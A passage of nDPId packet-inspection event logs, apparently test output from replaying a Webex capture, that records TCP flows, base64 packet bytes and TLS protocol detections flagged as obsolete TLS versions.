+00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1444570636163,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636163,"pkt":"ABoRAAACABoRAAABCABFAAAoAZFAABAGrtHRxd6fCggAAQG7uYqEY+15e5wSh1AS\/\/86HgAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1444570636163,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636163,"pkt":"ABoRAAACABoRAAABCABFAAAo0G1AAEAGr\/QKCAAB0cXen7mKAbt7nBKHhGPtelAQOQgBFwAA"} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636160,"flow_last_seen":1444570636164,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636164,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":271,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636170,"flow_last_seen":1444570636170,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636170,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1444570636170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636170,"pkt":"ABoRAAACABoRAAABCABFAAA8c99AAEAGAvcKCAABQER5meEvAbvnI7E0AAAAAKACOQgMmAAAAgQFtAQCCAoATMLrAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1444570636175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636175,"pkt":"ABoRAAACABoRAAABCABFAAAoAZNAABAGpVdARHmZCggAAQG74S8Y3E7L5yOxNVAS\/\/8JAQAA"} 
+00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1444570636175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636175,"pkt":"ABoRAAACABoRAAABCABFAAAoc+BAAEAGAwoKCAABQER5meEvAbvnI7E1GNxOzFAQOQjP+QAA"} +00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636170,"flow_last_seen":1444570636176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636176,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":276,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636180,"flow_last_seen":1444570636180,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636180,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1444570636180,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636180,"pkt":"ABoRAAACABoRAAABCABFAAA8nw9AAEAGbDMKCAABPm3nA7L2AbufQl3jAAAAAKACOQhqbwAAAgQFtAQCCAoATMLsAAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1444570636183,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636183,"pkt":"ABoRAAACABoRAAABCABFAAAoAZVAABAGOcI+becDCggAAQG7svZgvaIcn0Jd5FAS\/\/\/LpgAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1444570636183,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636183,"pkt":"ABoRAAACABoRAAABCABFAAAonxBAAEAGbEYKCAABPm3nA7L2AbufQl3kYL2iHVAQOQiSnwAA"} +00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636180,"flow_last_seen":1444570636185,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636185,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version 
(1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636248,"flow_last_seen":1444570636248,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636248,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1444570636248,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636248,"pkt":"ABoRAAACABoRAAABCABFAAA8NIdAAEAGU1wKCAABQERojK3MAbt5hvZ2AAAAAKACOQh5XQAAAgQFtAQCCAoATMLxAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1444570636252,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636252,"pkt":"ABoRAAACABoRAAABCABFAAAoAZdAABAGtmBARGiMCggAAQG7rcyGeQmJeYb2d1AS\/\/9NcQAA"} 
+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":283,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636252,"flow_last_seen":1444570636252,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636252,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1444570636252,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636252,"pkt":"ABoRAAACABoRAAABCABFAAA80SxAAEAGIt4KCAABch3Ki7gMAbtSShPdAAAAAKACOQjlGgAAAgQFtAQCCAoATMLxAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1444570636255,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636255,"pkt":"ABoRAAACABoRAAABCABFAAAoAZhAABAGIodyHcqLCggAAQG7uAyttewiUkoT3lAS\/\/+vWAAA"} 
+00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":285,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636255,"flow_last_seen":1444570636255,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636255,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":285,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1444570636255,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636255,"pkt":"ABoRAAACABoRAAABCABFAAA870JAAEAGjzEKCAABrfMETM36AbsKei2zAAAAAKACOQiHkAAAAgQFtAQCCAoATMLxAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1444570636259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636259,"pkt":"ABoRAAACABoRAAABCABFAAAoAZlAABAGrO+t8wRMCggAAQG7zfr1hdJMCnottFAS\/\/8j1AAA"} 
+00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636259,"flow_last_seen":1444570636259,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636259,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1444570636259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636259,"pkt":"ABoRAAACABoRAAABCABFAAA8u9ZAAEAGuzQKCAABQER5ZMv7AbtwVXkkAAAAAKACOQjQ2AAAAgQFtAQCCAoATMLyAAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1444570636263,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636263,"pkt":"ABoRAAACABoRAAABCABFAAAoAZpAABAGpYVARHlkCggAAQG7y\/uPqobbcFV5JVAS\/\/8eagAA"} 
+00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636264,"flow_last_seen":1444570636264,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636264,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1444570636264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636264,"pkt":"ABoRAAACABoRAAABCABFAAA8YelAAEAGFSMKCAABQER5Y9qhAbtb96MaAAAAAKACOQismgAAAgQFtAQCCAoATMLzAAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1444570636268,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636268,"pkt":"ABoRAAACABoRAAABCABFAAAoAZtAABAGpYVARHljCggAAQG72qGkCFzlW\/ejG1AS\/\/8PxQAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1444570636268,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636268,"pkt":"ABoRAAACABoRAAABCABFAAAoNIhAAEAGU28KCAABQERojK3MAbt5hvZ3hnkJilAQOQgUagAA"} 
+00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636248,"flow_last_seen":1444570636268,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636268,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1444570636269,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636269,"pkt":"ABoRAAACABoRAAABCABFAAAo0S1AAEAGIvEKCAABch3Ki7gMAbtSShPerbXsI1AQOQh2UQAA"} +00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636252,"flow_last_seen":1444570636269,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636269,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1444570636269,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636269,"pkt":"ABoRAAACABoRAAABCABFAAAo70NAAEAGj0QKCAABrfMETM36AbsKei209YXSTVAQOQjqzAAA"} +00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636255,"flow_last_seen":1444570636270,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636270,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1444570636270,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636270,"pkt":"ABoRAAACABoRAAABCABFAAAou9dAAEAGu0cKCAABQER5ZMv7AbtwVXklj6qG3FAQOQjlYgAA"} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":301,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636270,"flow_last_seen":1444570636270,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636270,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1444570636270,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636270,"pkt":"ABoRAAACABoRAAABCABFAAA879dAAEAGBrMKCAABch3IC7rhAbtuYS0jAAAAAKACOQivZQAAAgQFtAQCCAoATML0AAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1444570636273,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636273,"pkt":"ABoRAAACABoRAAABCABFAAAoAZ9AABAGJQByHcgLCggAAQG7uuGRntLcbmEtJFAS\/\/+vAwAA"} 
+00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636259,"flow_last_seen":1444570636273,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636273,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1444570636274,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636274,"pkt":"ABoRAAACABoRAAABCABFAAAoYepAAEAGFTYKCAABQER5Y9qhAbtb96MbpAhc5lAQOQjWvQAA"} +00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636264,"flow_last_seen":1444570636274,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636274,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1444570636275,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636275,"pkt":"ABoRAAACABoRAAABCABFAAAo79hAAEAGBsYKCAABch3IC7rhAbtuYS0kkZ7S3VAQOQh1\/AAA"} +00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636270,"flow_last_seen":1444570636276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636276,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636359,"flow_last_seen":1444570636359,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636359,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 